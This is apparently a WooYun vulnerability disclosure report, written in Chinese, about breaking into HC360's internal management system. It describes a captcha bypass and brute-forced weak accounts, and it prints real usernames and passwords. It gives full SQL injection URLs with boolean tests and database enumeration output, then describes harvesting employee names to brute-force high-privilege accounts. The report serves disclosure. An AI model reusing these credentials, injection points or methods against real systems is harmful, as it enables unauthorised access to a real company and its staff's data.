WooYun.org

1、找到了慧聪网后台管理系统的入口，登录其实有验证码限制，但是有问题可绕过

2、爆破获取到弱智账号、弱智密码，权限较小，不知道这账号什么时候谁建的
账号：12345 密码：123456
账号：11111 密码：123456

12345这个可以登录，没什么权限，可以看看内部资讯、论坛什么的，但是进不了其他系统

3、寻找sql注入点，手动找的，没用工具，工具不可控，弄坏就不好了，找了两个可证明的
sql注入1：
http://home.inc.hc360.com/homenew/home/BBS/forum2.aspx?boardid=450 and 1=1
正常
http://home.inc.hc360.com/homenew/home/BBS/forum2.aspx?boardid=450 and 1=2
报错
sql注入2：
http://home.inc.hc360.com/homenew/train/TrainList.aspx?id=6
available databases [5]:
[*] EXCHANGE
[*] HCDSS
[*] HOMENEW
[*] MDSYS
[*] TSMSYS
Database: HOMENEW
[5 tables]
+----------------------+
| BBS_BOARD |
| BBS_LIST |
| BBS_LIST_BAK20130315 |
| BBS_USERS |
| BIR_LIST |
+----------------------+
Database: HOMENEW
Table: BBS_USERS
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| LOGINID | VARCHAR2 |
| NIKENAME | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| SEX | CHAR |
| USERID | NUMBER |
+----------+----------+
这个用户表里就5条数据，没啥用，就开始换思路了
肯定不止这点问题，什么上传啥的也都有，不知道什么年代的编辑器了
4、搜集内部平台内若干员工姓名，分析账号格式
在论坛里好到大概有1800+员工的姓名，一般公司的账号会用拼音的格式
比如：西门庆= ximenqing 、 ximq 、 xi.mengqing 、 qing.ximen 等等
简单尝试了下，发现不对，看了下论坛用户名，应该是直接用的汉字，
但是提交请求的时候是url格式的，废了点劲，5里面是爆破出来账号
5、获取多个高权限账号，包括内部论坛超管，密码都是弱口令：123456，其他账号可能也有该问题

加*的都是权限高的，还有论坛超管
6、开始漫游

我比较喜欢这种文化，台球案子